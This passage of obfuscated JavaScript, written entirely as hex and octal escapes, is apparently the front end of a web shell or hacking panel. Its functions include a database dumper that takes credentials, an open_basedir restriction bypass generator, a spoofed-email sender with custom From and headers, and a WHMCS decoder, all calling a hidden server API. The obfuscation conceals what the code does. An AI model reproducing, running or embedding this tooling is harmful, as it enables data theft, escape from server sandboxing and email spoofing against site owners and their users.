0\x65\x64\x20\x24\173\144\141\164\141\x2e\154\145\156\x67\164\x68\175\x20\162\157\167\x28\163\x29\x60\54\x20\47\163\165\x63\143\x65\x73\x73\x27\x29\73\xa\11\11\11\175\40\145\154\163\x65\x20\x7b\12\11\x9\11\x9\151\146\x20\x28\162\x65\x73\165\x6c\164\x73\x45\x6c\x29\40\x7b\12\11\x9\x9\x9\x9\x72\145\x73\165\x6c\x74\163\105\154\56\x69\156\156\x65\162\110\x54\x4d\114\x20\x3d\x20\140\74\160\40\x73\164\171\154\x65\x3d\x22\143\x6f\154\157\x72\72\166\141\x72\50\55\55\x61\x63\x63\145\x6e\164\x2d\x72\x65\x64\x29\x3b\x22\76\xe2\235\214\x20\x24\173\162\x65\163\77\x2e\x6d\x65\x73\x73\141\147\145\x20\x7c\x7c\x20\x27\104\165\x6d\x70\40\146\x61\x69\154\x65\144\56\47\x7d\x3c\57\160\x3e\140\73\12\11\11\11\x9\175\xa\11\11\x9\x9\x74\150\151\x73\x2e\x74\x6f\141\x73\x74\50\x72\145\163\x3f\56\155\145\x73\163\141\x67\145\40\174\174\40\47\104\165\155\x70\40\146\x61\x69\154\x65\x64\56\47\54\x20\x27\145\162\162\x6f\162\47\x29\73\12\11\x9\x9\175\xa\x9\x9\175\x2c\xa\x9\x9\12\11\x9\x2f\x2f\40\x44\x61\164\x61\x62\141\163\x65\40\x44\x75\x6d\x70\x65\x72\xa\x9\x9\141\163\171\x6e\143\x20\144\141\164\x61\142\141\163\x65\104\x75\155\160\145\162\x28\51\40\173\xa\11\x9\x9\143\157\156\163\x74\x20\x68\x6f\163\164\x20\x3d\x20\x64\x6f\143\x75\155\145\156\x74\x2e\x67\145\164\x45\154\x65\155\145\x6e\164\x42\171\111\144\x28\x27\144\x62\55\x64\x75\155\160\55\150\157\163\164\x27\51\77\x2e\166\x61\154\x75\x65\x3b\xa\11\11\x9\143\157\156\163\164\x20\x75\163\x65\x72\40\x3d\40\x64\157\x63\165\155\x65\x6e\x74\56\x67\145\x74\x45\154\x65\155\x65\x6e\164\102\x79\x49\x64\x28\47\x64\142\55\144\x75\155\x70\x2d\165\x73\x65\x72\47\x29\77\x2e\166\x61\x6c\165\x65\x3b\xa\x9\x9\11\143\x6f\x6e\163\x74\40\x70\x61\163\x73\x20\75\x20\144\157\x63\165\x6d\x65\x6e\164\x2e\x67\x65\x74\x45\154\x65\155\145\156\164\x42\x79\x49\x64\50\47\144\142\x2d\x64\x75\155\x70\x2d\160\141\163\x73\x27\51\x3f\x2e\x76\141\x6c\x75\145\73\12\x9\x9\11\143\157\x6e\163\x74\40\x64\x61\164\x61\x62\x61\x73\x65\40\75\40\x64\157\x63\x75\x6d\x65\x6e\164\x2e\147\145\164\105\x6c\x65\155\145\156\164\x42\171\x49\144\x28\47\144\x62\55\x64\165\x6d\160\x2d\144\142\47\51\77\56\x76\x61\154\x75\145\x3b\xa\11\x9\x9\xa\11\11\x9\x69\x66\40\x28\41\x68\x6f\x73\164\40\x7c\x7c\40\41\165\x73\145\162\40\174\x7c\x20\x21\x64\141\x74\x61\142\x61\x73\x65\51\40\x7b\xa\11\x9\11\x9\162\x65\164\165\162\156\x20\164\150\151\x73\x2e\164\157\141\x73\x74\50\47\x48\x6f\163\164\54\40\x75\163\145\x72\54\x20\141\156\144\40\x64\141\x74\141\x62\141\x73\x65\40\x61\162\x65\x20\x72\145\161\x75\x69\162\x65\x64\56\x27\54\40\x27\145\162\x72\157\162\47\x29\73\12\11\x9\x9\x7d\xa\x9\11\11\xa\x9\11\11\143\x6f\x6e\163\x74\x20\x72\145\x73\165\154\164\x73\105\154\x20\75\x20\x64\x6f\143\165\155\x65\156\x74\56\147\145\x74\x45\x6c\x65\x6d\145\x6e\x74\102\171\111\144\x28\47\144\142\55\144\165\155\x70\55\162\x65\x73\x75\x6c\164\x73\x27\51\x3b\xa\x9\11\x9\x69\146\40\x28\x72\145\x73\x75\154\x74\163\x45\154\x29\40\x72\145\x73\x75\154\x74\163\x45\x6c\x2e\151\156\156\145\x72\110\x54\x4d\x4c\40\75\40\47\74\x70\40\x73\x74\171\154\x65\x3d\x22\x63\157\154\157\162\x3a\x76\x61\162\x28\x2d\55\141\x63\x63\x65\x6e\x74\55\147\157\x6c\144\51\x3b\x22\76\x44\165\155\160\151\x6e\147\40\x64\141\164\x61\x62\141\x73\145\56\56\x2e\x3c\57\160\x3e\47\73\12\11\11\x9\xa\x9\11\x9\x63\157\x6e\x73\164\40\x72\145\x73\x20\x3d\40\141\x77\141\151\x74\x20\164\150\151\163\x2e\141\160\x69\x28\x27\x64\x61\x74\141\x62\x61\163\145\137\144\x75\155\x70\145\162\47\54\40\173\x20\150\157\163\x74\54\40\165\x73\145\162\54\x20\160\x61\x73\x73\54\x20\x64\x61\164\141\142\141\163\x65\40\175\x29\73\12\x9\11\11\xa\11\11\11\x69\146\40\x28\162\145\x73\x20\46\x26\40\x72\x65\x73\56\x73\x74\x61\164\x75\x73\40\x3d\75\x3d\40\47\163\165\x63\143\x65\x73\163\47\x29\x20\173\xa\11\11\x9\x9\151\x66\x20\x28\162\145\163\165\x6c\x74\163\105\154\x29\x20\173\12\11\11\x9\x9\11\154\145\164\x20\x68\x74\155\x6c\x20\x3d\x20\140\x3c\x64\151\x76\40\163\x74\x79\x6c\145\75\x22\x70\x61\x64\x64\x69\x6e\147\x3a\61\60\x70\x78\x3b\40\x62\141\x63\x6b\x67\162\x6f\x75\x6e\144\72\x76\x61\x72\x28\55\x2d\142\x67\x2d\x6c\x69\x67\x68\x74\51\x3b\40\x62\x6f\162\144\145\x72\x2d\x72\141\144\151\165\x73\72\x36\160\x78\x3b\x20\155\141\x72\x67\151\x6e\x2d\x62\157\164\164\x6f\x6d\x3a\x31\162\x65\x6d\73\42\x3e\12\11\11\11\11\x9\x9\x3c\163\164\x72\157\x6e\147\76\x44\x75\155\x70\x65\144\40\x24\x7b\x72\x65\x73\56\x74\x61\x62\154\145\x73\175\40\164\x61\x62\x6c\145\50\x73\x29\72\x3c\57\x73\164\162\157\x6e\147\x3e\12\11\11\x9\11\11\74\57\x64\x69\x76\76\12\11\x9\11\x9\x9\74\160\162\x65\40\x63\x6c\141\163\x73\x3d\42\157\165\x74\160\x75\x74\x2d\x62\x6f\170\42\x20\x73\164\x79\x6c\145\x3d\x22\155\x61\170\55\150\145\151\x67\150\x74\72\65\x30\60\160\x78\73\x20\x6f\166\145\162\146\x6c\x6f\167\55\171\72\x61\x75\x74\x6f\73\x22\x3e\44\173\x74\x68\x69\163\56\x65\x73\143\x61\160\x65\x48\164\x6d\154\50\x72\x65\x73\56\144\165\155\x70\51\175\x3c\x2f\160\162\145\x3e\12\11\x9\11\x9\x9\74\142\165\x74\164\x6f\x6e\x20\157\x6e\143\x6c\x69\143\153\75\x22\156\x61\166\x69\147\141\164\x6f\x72\56\143\x6c\151\160\142\x6f\x61\x72\144\x2e\x77\162\151\x74\145\x54\145\x78\164\50\x74\x68\151\163\56\x70\162\x65\x76\151\157\165\163\105\154\145\155\x65\156\164\123\x69\x62\x6c\x69\156\x67\x2e\x74\x65\x78\x74\x43\x6f\x6e\164\x65\156\x74\51\42\x20\163\x74\x79\x6c\145\75\x22\155\141\162\x67\151\x6e\x2d\164\157\x70\x3a\60\x2e\x35\162\x65\155\x3b\x22\x3e\xf0\237\223\x8b\40\x43\x6f\x70\x79\x20\104\165\155\160\x3c\57\x62\165\164\x74\157\156\x3e\140\x3b\12\11\11\x9\x9\11\162\145\x73\x75\x6c\164\x73\x45\154\x2e\x69\x6e\x6e\145\162\x48\x54\x4d\114\40\x3d\x20\150\164\x6d\154\73\12\11\11\11\11\x7d\12\x9\x9\11\x9\x74\150\x69\x73\x2e\164\157\x61\163\164\x28\140\104\x75\x6d\x70\x65\144\x20\x24\x7b\162\x65\163\56\x74\x61\x62\154\145\x73\175\x20\x74\141\x62\x6c\145\x28\163\x29\x60\x2c\40\x27\163\165\x63\143\x65\163\163\47\51\73\12\x9\11\11\x7d\x20\145\154\163\145\x20\x7b\12\x9\x9\x9\11\151\x66\x20\50\x72\145\163\x75\154\164\x73\x45\154\x29\x20\x7b\12\x9\11\11\11\x9\162\145\163\165\x6c\x74\x73\105\x6c\56\x69\x6e\156\145\162\x48\x54\x4d\114\x20\x3d\40\140\74\x70\x20\163\x74\171\x6c\145\75\x22\143\157\x6c\157\162\72\166\141\162\50\x2d\x2d\x61\x63\x63\145\156\x74\x2d\162\x65\144\51\x3b\x22\x3e\xe2\235\214\x20\x24\173\162\145\x73\77\x2e\155\x65\x73\x73\141\147\x65\x20\x7c\174\x20\x27\104\x75\x6d\160\x20\146\141\x69\154\x65\144\56\47\x7d\x3c\x2f\x70\x3e\x60\x3b\xa\x9\11\11\x9\175\xa\x9\11\x9\11\x74\x68\151\163\56\x74\157\x61\x73\x74\50\162\145\x73\x3f\56\x6d\145\x73\x73\x61\x67\x65\40\174\x7c\x20\x27\x44\x75\155\160\40\146\x61\x69\x6c\x65\144\x2e\47\x2c\40\47\x65\x72\x72\x6f\x72\47\51\73\12\x9\x9\11\175\12\11\x9\x7d\54\xa\11\x9\xa\11\11\x2f\x2f\40\x4f\x70\145\x6e\x20\102\141\163\x65\104\151\x72\40\102\171\160\x61\x73\163\xa\x9\11\141\163\171\156\x63\40\157\160\145\x6e\102\x61\163\x65\144\151\x72\102\x79\160\x61\163\163\x28\51\x20\x7b\12\11\11\x9\x63\157\156\163\x74\40\x72\145\163\165\154\x74\163\x45\x6c\x20\75\x20\x64\x6f\143\165\155\145\x6e\x74\56\x67\x65\164\105\154\145\155\x65\156\164\102\x79\x49\144\x28\x27\x62\x61\163\x65\144\151\x72\x2d\x72\145\x73\x75\x6c\164\163\x27\x29\x3b\12\x9\x9\11\x69\146\40\50\162\x65\163\x75\154\x74\163\x45\x6c\x29\40\x72\x65\x73\x75\x6c\x74\x73\105\154\56\x69\x6e\x6e\145\x72\110\124\115\114\x20\x3d\x20\47\74\160\x20\163\x74\171\x6c\x65\75\42\143\157\x6c\157\x72\x3a\x76\x61\162\50\55\55\x61\143\x63\x65\x6e\x74\55\147\x6f\154\x64\x29\73\42\x3e\107\145\156\x65\x72\x61\164\151\156\147\x20\142\x79\160\141\x73\x73\40\x6d\145\x74\150\x6f\144\163\x2e\56\x2e\x3c\57\160\76\x27\73\12\11\11\x9\12\x9\x9\x9\143\157\x6e\163\164\x20\162\x65\163\40\75\x20\141\167\141\x69\164\x20\164\150\x69\x73\56\141\160\x69\x28\x27\x6f\x70\x65\x6e\137\142\x61\x73\145\144\x69\162\x5f\x62\171\x70\x61\163\x73\x27\54\x20\x7b\x7d\x29\73\12\x9\11\11\xa\11\11\x9\x69\146\40\50\x72\145\163\40\46\x26\x20\162\145\163\56\x73\x74\141\164\165\x73\x20\x3d\x3d\75\x20\47\x73\x75\143\x63\x65\163\163\47\x29\40\x7b\xa\x9\x9\11\11\x63\x6f\156\x73\164\40\155\x65\x74\x68\x6f\144\x73\40\75\x20\x72\145\163\56\x6d\x65\164\150\157\x64\163\40\x7c\x7c\x20\x5b\x5d\x3b\12\11\11\x9\11\151\146\x20\50\162\145\163\x75\154\164\163\x45\154\51\40\173\xa\11\11\x9\x9\11\154\x65\x74\40\x68\164\x6d\154\x20\x3d\40\x27\x3c\x64\x69\166\40\x73\x74\171\154\145\75\42\144\151\x73\x70\154\x61\x79\72\146\x6c\145\x78\73\x20\x66\x6c\x65\x78\x2d\144\x69\162\x65\x63\164\x69\157\156\72\x63\x6f\x6c\x75\x6d\156\73\x20\147\x61\x70\x3a\x31\x72\145\155\x3b\x22\76\47\73\xa\x9\x9\11\x9\11\x6d\145\x74\x68\x6f\144\x73\56\146\157\162\105\141\x63\150\x28\x6d\145\x74\x68\x6f\144\40\75\x3e\40\173\xa\11\x9\x9\x9\x9\x9\x68\164\155\x6c\x20\x2b\75\x20\140\74\144\151\x76\x20\163\x74\x79\154\145\75\x22\160\x61\x64\144\151\156\x67\72\x31\65\160\x78\x3b\x20\142\141\143\153\147\162\157\165\x6e\x64\x3a\166\x61\x72\50\x2d\55\x62\x67\x2d\x6c\151\147\150\x74\x29\x3b\x20\x62\157\162\144\145\162\55\x72\x61\144\151\165\x73\72\66\160\170\73\x22\76\xa\x9\11\x9\x9\x9\11\x9\x3c\150\x34\40\163\164\171\x6c\x65\x3d\x22\x6d\141\x72\x67\x69\156\55\x74\x6f\160\72\x30\x3b\x20\x63\157\x6c\x6f\162\72\166\x61\x72\50\x2d\55\x61\x63\x63\145\x6e\164\55\x62\154\165\145\51\73\42\x3e\x24\x7b\x74\150\151\x73\x2e\x65\163\143\x61\x70\145\110\164\x6d\154\50\x6d\x65\164\150\157\x64\x2e\x6d\145\x74\x68\157\144\51\175\74\57\150\x34\x3e\12\11\11\11\x9\x9\x9\11\74\x70\162\145\x20\x63\154\x61\163\163\x3d\x22\157\165\x74\x70\165\x74\55\142\157\x78\x22\40\163\164\171\154\x65\x3d\x22\x6d\x61\170\x2d\x68\x65\x69\147\x68\164\72\62\60\x30\x70\170\73\x20\x6f\x76\145\162\146\154\x6f\x77\55\x79\x3a\141\165\x74\x6f\x3b\42\x3e\x24\173\164\150\151\163\x2e\145\x73\143\x61\x70\x65\110\x74\x6d\154\50\x6d\145\164\150\157\x64\56\x63\157\144\x65\x29\x7d\74\x2f\160\x72\x65\x3e\xa\11\x9\x9\x9\x9\11\11\x3c\142\165\x74\x74\x6f\156\x20\157\156\x63\154\151\143\153\75\42\156\x61\166\151\147\x61\164\157\x72\x2e\143\x6c\151\160\142\x6f\141\162\144\56\167\162\151\164\145\x54\145\170\x74\50\x74\x68\151\x73\x2e\x70\162\145\166\151\157\x75\163\x45\154\145\155\x65\x6e\x74\x53\151\x62\x6c\151\156\147\56\x74\x65\x78\164\103\x6f\x6e\x74\145\x6e\164\51\x22\x20\x73\x74\x79\154\145\x3d\x22\155\x61\x72\147\x69\x6e\55\164\157\x70\72\60\56\x35\x72\145\155\73\42\76\360\237\x93\x8b\x20\103\157\160\171\x20\x43\157\144\x65\74\x2f\142\165\x74\x74\157\x6e\76\xa\x9\x9\x9\11\x9\11\x3c\57\x64\151\x76\76\140\x3b\xa\x9\11\11\x9\x9\175\x29\73\xa\11\11\x9\11\x9\x68\164\155\154\40\53\75\x20\x27\74\x2f\144\x69\x76\76\47\73\12\x9\x9\11\x9\x9\162\145\163\x75\x6c\x74\163\x45\154\x2e\x69\x6e\156\145\162\x48\x54\115\x4c\x20\x3d\40\150\x74\155\154\73\xa\x9\11\11\11\x7d\xa\11\11\x9\x9\x74\150\x69\x73\56\x74\x6f\x61\x73\164\50\47\x42\x79\160\x61\x73\163\40\x6d\x65\x74\150\157\x64\x73\40\147\145\156\x65\x72\x61\x74\145\x64\41\47\x2c\x20\x27\x73\x75\143\143\145\x73\x73\47\51\73\12\x9\x9\11\x7d\x20\145\x6c\x73\145\40\x7b\12\11\11\x9\x9\151\146\40\50\x72\x65\x73\165\x6c\164\x73\105\154\x29\40\173\xa\11\x9\x9\11\11\162\145\163\165\x6c\164\x73\105\154\56\151\156\x6e\145\162\x48\x54\115\114\40\75\40\140\74\x70\40\x73\x74\171\x6c\145\x3d\x22\143\x6f\154\x6f\x72\72\x76\x61\162\x28\55\55\x61\x63\x63\145\156\164\x2d\x72\x65\x64\51\73\42\x3e\342\x9d\214\x20\44\x7b\x72\145\163\77\56\155\x65\163\163\x61\x67\145\x20\174\x7c\x20\x27\x46\141\x69\x6c\x65\x64\56\x27\x7d\74\x2f\x70\x3e\140\73\12\x9\x9\11\11\x7d\12\x9\x9\x9\x9\x74\150\151\163\x2e\164\157\141\163\164\x28\162\x65\x73\x3f\x2e\x6d\145\x73\x73\x61\147\145\x20\x7c\x7c\40\47\x46\141\151\x6c\145\144\x2e\47\x2c\x20\47\x65\x72\x72\157\162\47\x29\73\xa\x9\11\11\175\xa\x9\x9\175\x2c\12\x9\x9\xa\x9\11\57\x2f\x20\x46\141\153\145\40\115\x61\x69\154\12\x9\x9\x61\163\171\156\x63\x20\146\141\x6b\x65\x4d\x61\x69\154\50\x29\40\173\xa\11\x9\11\143\157\x6e\163\x74\x20\x74\157\40\x3d\40\144\x6f\143\165\155\x65\x6e\x74\56\147\x65\164\105\154\145\155\x65\x6e\164\102\x79\x49\144\x28\47\x66\x61\153\x65\55\x6d\x61\x69\x6c\55\164\157\x27\51\77\56\x76\141\154\165\145\73\xa\x9\x9\11\x63\157\x6e\163\x74\40\146\x72\x6f\x6d\x20\75\x20\x64\x6f\x63\165\155\145\156\164\x2e\147\145\164\105\x6c\x65\x6d\145\x6e\x74\102\x79\x49\x64\50\47\146\x61\x6b\x65\55\155\x61\x69\154\55\146\162\x6f\155\47\51\77\x2e\166\x61\x6c\165\145\x3b\xa\x9\11\x9\143\157\156\163\x74\40\163\x75\x62\x6a\145\143\x74\x20\75\40\x64\x6f\x63\165\x6d\x65\x6e\164\56\147\x65\x74\105\154\x65\x6d\x65\x6e\x74\x42\171\x49\x64\x28\47\x66\141\153\145\55\x6d\x61\x69\x6c\x2d\x73\x75\x62\x6a\145\143\164\47\51\x3f\x2e\166\141\154\x75\x65\x3b\12\11\x9\11\143\x6f\x6e\163\164\x20\x6d\145\163\163\x61\147\145\40\75\40\144\x6f\x63\165\155\x65\156\164\56\x67\x65\164\x45\154\x65\155\145\156\164\x42\171\x49\x64\x28\x27\146\x61\153\145\55\155\141\x69\x6c\x2d\x6d\145\163\x73\x61\x67\145\x27\x29\77\56\x76\141\154\165\145\x3b\12\11\11\x9\143\157\156\163\164\x20\150\x65\x61\144\x65\162\163\x20\x3d\40\x64\157\143\x75\x6d\x65\156\x74\x2e\x67\x65\x74\x45\x6c\145\x6d\145\x6e\164\102\171\x49\144\x28\x27\x66\141\x6b\145\55\155\x61\151\154\x2d\x68\145\141\144\145\x72\163\x27\x29\x3f\56\166\x61\154\165\x65\x3b\xa\x9\11\x9\12\11\x9\x9\x69\x66\40\x28\x21\164\x6f\x20\x7c\x7c\40\41\146\162\157\x6d\40\x7c\174\x20\x21\163\165\142\x6a\145\143\x74\40\174\174\40\x21\155\x65\163\163\x61\147\x65\51\x20\x7b\xa\11\x9\x9\x9\162\145\x74\x75\162\156\40\164\150\151\163\56\x74\157\x61\163\164\x28\47\x54\157\54\40\106\x72\157\x6d\x2c\x20\x53\165\x62\x6a\x65\x63\x74\x2c\x20\141\156\x64\40\115\x65\163\163\141\147\x65\40\x61\x72\145\40\162\145\x71\165\x69\x72\145\144\x2e\47\x2c\x20\47\145\162\162\x6f\x72\47\51\x3b\xa\x9\x9\11\x7d\xa\x9\x9\11\12\11\x9\11\143\x6f\x6e\163\x74\x20\143\157\156\x66\151\x72\x6d\145\x64\40\x3d\40\141\167\141\151\164\40\x74\x68\151\163\x2e\163\x68\157\x77\103\x6f\156\x66\x69\162\155\115\157\144\x61\x6c\50\x60\123\145\x6e\x64\x20\x65\155\141\x69\154\40\x74\x6f\40\74\163\x74\162\x6f\x6e\147\76\x24\x7b\164\x6f\175\74\57\163\164\162\x6f\156\x67\76\77\140\x2c\40\x7b\x20\x74\171\x70\145\72\x20\x27\x71\165\145\163\x74\x69\157\x6e\47\x20\x7d\51\73\40\x69\x66\40\50\41\x63\x6f\156\x66\x69\162\x6d\x65\x64\x29\x20\173\12\11\x9\x9\11\162\x65\x74\165\162\x6e\73\12\11\x9\11\x7d\12\11\x9\x9\12\x9\x9\11\x63\x6f\156\163\164\40\162\145\163\x75\154\x74\163\x45\x6c\x20\x3d\x20\x64\157\x63\165\x6d\145\156\x74\56\147\x65\164\x45\x6c\x65\155\145\156\x74\102\x79\111\x64\50\47\146\141\x6b\145\x2d\155\141\x69\154\x2d\162\x65\163\x75\154\164\x73\47\51\73\12\x9\11\x9\x69\146\40\x28\x72\145\x73\x75\x6c\x74\163\x45\x6c\51\40\x72\x65\163\165\154\x74\x73\x45\154\x2e\151\156\156\x65\x72\x48\x54\x4d\114\x20\x3d\40\47\74\160\40\x73\164\171\154\x65\75\x22\143\x6f\x6c\157\162\x3a\166\x61\x72\50\55\55\141\143\143\x65\156\164\x2d\x67\157\154\144\51\x3b\x22\x3e\123\145\156\144\x69\156\x67\x20\x65\155\141\151\154\x2e\x2e\56\74\x2f\160\x3e\x27\x3b\12\x9\11\11\xa\11\11\11\x63\157\x6e\x73\x74\x20\x72\x65\x73\40\x3d\x20\141\167\x61\x69\164\x20\164\150\x69\x73\56\x61\160\x69\50\x27\146\141\153\x65\x5f\x6d\x61\x69\x6c\x27\x2c\x20\173\40\164\x6f\x2c\40\146\x72\x6f\x6d\x2c\40\x73\165\142\x6a\x65\x63\x74\x2c\40\x6d\x65\163\163\x61\x67\x65\54\x20\x68\145\x61\x64\145\x72\x73\x20\175\x29\73\xa\11\x9\11\12\11\x9\11\x69\x66\40\50\162\x65\163\40\46\x26\x20\x72\x65\x73\56\x73\x74\x61\164\165\163\x20\x3d\75\75\x20\x27\x73\x75\x63\x63\x65\x73\163\x27\x29\x20\173\xa\x9\11\11\x9\151\146\x20\x28\162\x65\x73\165\x6c\164\163\x45\154\51\x20\173\xa\11\11\x9\x9\x9\x72\145\x73\x75\154\164\163\x45\x6c\x2e\x69\x6e\156\145\x72\x48\x54\x4d\x4c\x20\x3d\x20\x60\74\144\151\166\40\163\x74\x79\154\145\75\x22\160\141\144\x64\151\156\x67\72\x31\x35\160\x78\73\x20\x62\x61\x63\x6b\147\x72\157\x75\156\144\x3a\166\141\x72\50\55\55\x62\147\55\x6c\151\x67\x68\x74\51\x3b\x20\142\157\162\144\x65\x72\x2d\x72\x61\x64\151\x75\163\x3a\66\160\170\x3b\42\x3e\12\11\x9\11\x9\x9\x9\74\150\64\40\x73\x74\x79\x6c\x65\75\x22\155\x61\162\x67\x69\x6e\55\164\x6f\x70\x3a\60\73\x20\143\x6f\x6c\x6f\162\72\x76\141\x72\x28\x2d\55\141\143\x63\145\x6e\x74\x2d\x67\162\x65\145\156\51\x3b\42\x3e\xe2\234\205\x20\x45\155\x61\x69\x6c\x20\x53\x65\x6e\x74\x21\74\x2f\x68\x34\x3e\12\x9\11\11\x9\11\11\x3c\160\76\105\155\141\x69\x6c\x20\x73\145\156\164\x20\x73\x75\143\143\145\x73\163\x66\x75\154\x6c\x79\x20\x74\x6f\x20\44\x7b\x74\150\x69\x73\x2e\145\163\x63\x61\160\145\110\164\x6d\x6c\50\x74\157\x29\175\x3c\57\160\x3e\12\x9\x9\x9\11\x9\x3c\57\144\x69\x76\76\x60\73\12\11\x9\x9\x9\175\12\11\x9\11\11\x74\x68\151\x73\x2e\x74\x6f\x61\163\x74\50\x27\x45\155\x61\x69\154\x20\163\x65\156\x74\40\x73\x75\143\x63\x65\163\x73\146\165\154\154\171\41\47\x2c\x20\x27\163\x75\143\x63\145\x73\163\x27\x29\x3b\xa\11\11\11\175\40\x65\x6c\x73\x65\x20\173\12\11\11\11\11\151\146\40\x28\x72\x65\x73\x75\x6c\x74\163\105\x6c\x29\x20\x7b\12\11\x9\11\x9\11\162\145\x73\x75\x6c\164\x73\x45\154\56\x69\x6e\156\145\162\110\x54\x4d\114\40\x3d\x20\140\74\160\x20\x73\164\171\154\145\75\x22\143\x6f\x6c\157\x72\72\x76\x61\162\x28\x2d\55\141\x63\143\145\156\x74\x2d\162\145\144\51\73\42\76\xe2\x9d\214\40\44\173\x72\145\x73\x3f\x2e\155\x65\163\x73\141\x67\x65\x20\174\x7c\40\47\106\x61\151\154\x65\144\x20\164\157\x20\163\145\156\144\40\x65\155\141\x69\154\x2e\47\x7d\x3c\x2f\160\76\140\73\12\11\11\x9\11\175\xa\x9\11\x9\11\x74\x68\x69\163\x2e\164\157\x61\163\164\x28\162\x65\163\x3f\56\155\145\x73\163\x61\147\x65\40\x7c\174\x20\47\106\x61\151\x6c\145\x64\x20\x74\x6f\40\x73\145\x6e\144\40\x65\x6d\x61\x69\x6c\56\47\x2c\40\47\145\x72\x72\x6f\162\47\x29\x3b\12\11\11\x9\175\xa\11\11\175\54\12\11\x9\12\11\11\x2f\x2f\40\127\x48\x4d\103\123\40\x44\x65\143\x6f\x64\x65\x72\12\11\11\x61\x73\x79\x6e\143\40\x77\x68\x6d\143\163\x44\145\143\157\144\x65\x72\x28\x29\40\173\xa\x9\x9\x9\x63\x6f\x6e\163\164\40\x65\156\x63\157\144\145\x64\40\75\40\144\157\143\x75\155\x65\156\x74\56\147\145\164\105\154\145\x6d\x65\156\x74\x42\171\x49\x64\50\x27\x77\150\x6d\x63\163\x2d\x65\x6e\143\157\x64\x65\x64\47\x29\77\56\x76\141\x6c\x75\145\73\12\x9\x9\11\12\x9\11\x9\151\146\40\50\41\145\156\x63\157\144\x65\x64\x29\x20\x7b\xa\11\x9\11\11\x72\x65\x74\165\x72\156\x20\164\x68\x69\x73\x2e\x74\x6f\141\x73\164\50\47\105\x6e\143\157\x64\145\144\40\163\164\162\151\x6e\x67\40\151\163\40\x72\x65\161\165\x69\x72\145\x64\x2e\47\x2c\40\x27\x65\x72\162\x6f\162\x27\51\x3b\xa\x9\x9\11\x7d\12\x9\11\11\12\11\11\11\143\x6f\x6e\163\x74\x20\x72\145\x73\165\x6c\x74\x73\x45\154\40\x3d\40\x64\x6f\x63\x75\155\145\x6e\164\x2e\147\x65\x74\x45\x6c\145\x6d\145\156\164\x42\171\x49\x64\x28\47\x77\x68\155\143\163\x2d\162\145\163\x75\x6c\164\x73\47\x29\x3b\xa\x9\11\11\x69\x66\x20\50\x72\145\163\x75\x6c\164\x73\x45\x6c\x29\40\x72\x65\163\165\154\x74\163\105\154\56\151\156\x6e\145\162\110\124\x4d\114\40\x3d\40\47\74\x70\x20\163\164\171\x6c\145\75\x22\x63\x6f\154\157\x72\x3a\x76\x61\162\50\x2d\x2d\141\x63\143\145\x6e\164\55\147\x6f\154\144\51\x3b\42\x3e\104\x65\143\157\144\151\x6e\x67\x2e\56\x2e\74\x2f\x70\x3e\x27\x3b\xa\11\x9\x9\xa\11\x9\11\x63\x6f\156\x73\x74\x20\x72\x65\x73\x20\75\x20\141\167\x61\x69\x74\x20\164\x68\151\163\x2e\141\160\x69\50\x27\x77\x68\x6d\143\x73\137\144\145\x63\157\144\145\162\x27\x2c\40\173\x20\x65\156\143\x6f\144\x65\144\40\175\x29\x3b\12\x9\x9\x9\xa\x9\11\x9\151\x66\40\50\162\x65\x73\x20\46\46\x20\162\x65\x73\56\x73\164\141\164\165\163\x20\x3d\75\75\40\47\x73\165\143\143\145\163\x73\x27\x29\40\173\12\11\11\11\11\151\146\40\50\x72\145\x73\165\x6c\x74\x73\105\154\51\40\x7b\12\x9\11\11\11\11\154\x65\164\40\x68\164\x6d\x6c\x20\75\40\140\x3c\x64\x69\166\40\163\x74\x79\154\145\75\x22\x70\x61\144\x64\x69\x6e\x67\x3a\x31\x30\x70\x78\73\40\x62\141\143\x6b\147\x72\x6f\x75\x6e\x64\x3a\166\x61\x72\x28\55\55\142\x67\55\154\151\x67\x68\164\x29\x3b\x20\x62\157\x72\x64\145\x72\55\x72\141\x64\151\x75\x73\72\66\160\x78\73\x20\155\141\x72\147\151\x6e\x2d\x62\x6f\164\164\157\155\72\x31\162\x65\155\x3b\42\76\xa\x9\11\x9\11\x9\x9\74\163\164\162\x6f\x6e\147\76\104\x65\143\x6f\144\x65\x64\x3a\74\57\163\164\x72\x6f\156\147\76\12\11\11\x9\x9\x9\x3c\x2f\x64\151\x76\x3e\12\x9\11\x9\x9\11\x3c\160\x72\145\40\x63\x6c\141\x73\163\75\x22\x6f\x75\164\x70\165\x74\55\x62\x6f\x78\42\x20\163\x74\171\154\x65\75\x22\x6d\x61\x78\x2d\150\x65\151\x67\150\164\x3a\64\60\x30\160\170\73\x20\x6f\x76\x65\x72\146\154\x6f\x77\55\171\x3a\141\x75\164\x6f\x3b\x22\x3e\x24\173\x74\150\151\x73\56\x65\163\143\x61\160\x65\x48\x74\x6d\x6c\x28\x72\145\x73\56\x64\x65\143\157\144\x65\144\x29\175\74\x2f\x70\x72\145\76\12\x9\11\x9\11\11\x3c\x62\165\164\164\157\x6e\40\x6f\x6e\143\x6c\151\x63\x6b\75\42\156\141\x76\x69\x67\x61\x74\x6f\162\56\x63\x6c\x69\160\x62\157\x61\162\x64\x2e\x77\x72\x69\x74\x65\x54\x65\x78\164\x28\164\150\151\163\x2e\x70\162\145\x76\151\x6f\165\163\x45\x6c\145\155\x65\156\x74\x53\x69\142\x6c\151\x6e\147\56\x74\x65\x78\x74\103\x6f\x6e\164\x65\156\164\x29\x22\x20\163\164\171\x6c\145\75\x22\x6d\141\x72\x67\x69\x6e\55\164\157\160\x3a\60\x2e\x35\162\x65\155\73\x22\x3e\xf0\237\x93\213\x20\103\157\x70\171\x3c\57\142\165\164\164\157\x6e\76\x60\x3b\12\11\x9\x9\x9\11\162\x65\163\x75\x6c\x74\163\105\x6c\56\151\x6e\x6e\x65\162\110\x54\x4d\114\x20\75\x20\x68\x74\155\x6c\x3b\xa\x9\x9\11\11\175\xa\11\x9\11\x9\164\x68\x69\163\56\x74\x6f\141\163\164\50\x27\104\x65\x63\x6f\x64\145\x64\40\x73\x75\x63\x63\x65\x73\x73\146\165\154\x6c\171\41\x27\x2c\x20\47\163\165\143\143\145\x73\x73\x27\51\x3b\12\11\x9\11\175\x20\145\x6c\163\x65\x20\x7b\xa\x9\x9\11\x9\151\146\x20\50\162\x65\x73\x75\154\164\163\105\x6c\x29\40\173\xa\11\x9\11\x9\11\162\x65\x73\x75\154\x74\x73\105\x6c\56\x69\156\x6e\145\162\110\124\x4d\114\40\75\x20\x60\74\x70\x20\x73\164\x79\x6c\145\x3d\42\143\157\154\x6f\162\72\x76\141\162\x28\55\55\141\143\x63\145\x6e\x74\55\x72\x65\144\51\x3b\42\76\